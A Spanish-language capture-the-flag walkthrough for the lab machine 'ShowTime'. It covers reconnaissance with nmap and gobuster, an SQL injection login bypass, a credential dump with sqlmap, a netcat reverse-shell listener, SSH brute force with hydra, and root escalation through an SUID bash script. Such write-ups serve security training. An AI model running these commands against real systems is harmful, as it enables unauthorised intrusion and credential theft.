ShowTime
✍️ Autor: maciiii___ 🔍 Dificultad: Fácil 📅 Fecha de creación: 24/07/2024
🔍 RECONOCIMIENTO
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 172.17.0.2
para verificar la conectividad de red.

A continuación, realizamos el comando:
nmap -sVC -p- -n --min-rate 5000 172.17.0.2
para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.
🔎 EXPLORACIÓN
Se utiliza el comando:
sudo nmap -sCV -p22,80 -v 172.17.0.2
para obtener más información sobre esos puertos específicamente.

Seguimos indagando más sobre los puertos y ahora indagamos sobre el servicio HTTP. Se ingresó la dirección IP en el navegador lo que llevó a que la página web del Casino.

Ahora buscaremos directorios y archivos con la herramienta Gobuster a través de:
gobuster dir -u http://172.17.0.2 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,doc,html,txt
Hacemos una inyección SQL básica en el directorio /login_page
.
' OR '1'='1


Realizamos este comando para identificar bases de datos.
sqlmap -u http://172.17.0.2/login_page/index.php --forms --dbs --batch

Ahora para ver las tablas dentro de la base de datos de users.
sqlmap -u http://172.17.0.2/login_page/index.php --forms -D users --tables --batch

Ahora vemos las columnas dentro de la tabla de usuarios.
sqlmap -u http://172.17.0.2/login_page/index.php --forms -D users -T usuarios --columns --batch

Ahora vemos la información que hay guardada en los registros.
sqlmap -u http://172.17.0.2/login_page/index.php --forms -D users -T usuarios -C password,id,username --dump --batch

🚀 EXPLOTACIÓN
Con el tercer usuario nos logueamos y nos sale un panel de administración en el que podemos ejecutar un comando en Python.

Nos ponemos en escucha para recibir la Reverse Shell.
nc -nlvp 443

Hacemos el tratamiento de la TTY para trabajar más cómodos.
🔐 PRIVILEGIOS
Al estar dentro y ejecutar:
whoami
aún no somos root, por lo que hacemos:
sudo -l
para ver si hay algo para explotar. No tenemos permisos con SUDO.
En el directorio /tmp
hay una archivo del texto oculto.

Creamos un diccionario pasando de mayúsculas a minúsculas para realizar la fuerza bruta.
tr '[:upper:]' '[:lower:]' < trucos.txt > diccionario.txt
Realizamos el ataque de fuerza bruta mediante Hydra.
hydra -l joe -P diccionario.txt ssh://172.17.0.2 -t 64

Nos logueamos con esas credenciales encontradas.
ssh joe@172.17.0.2

Tenemos permisos SUDO con posh por lo que miramos esta página para ver como escalar privilegios.
sudo -u luciano /bin/posh

En el directorio de luciano principal encontramos un script que no podemos editar con nano ni con vim por lo que lo hacemos con echo.

echo -e '#!/bin/bash\n\nchmod u+s /bin/bash' > script.sh
Ahora ejecutamos el script para ser root.
sudo -u root /bin/bash /home/luciano/script.sh
Ejecutamos.
bash -p

Last updated
Was this helpful?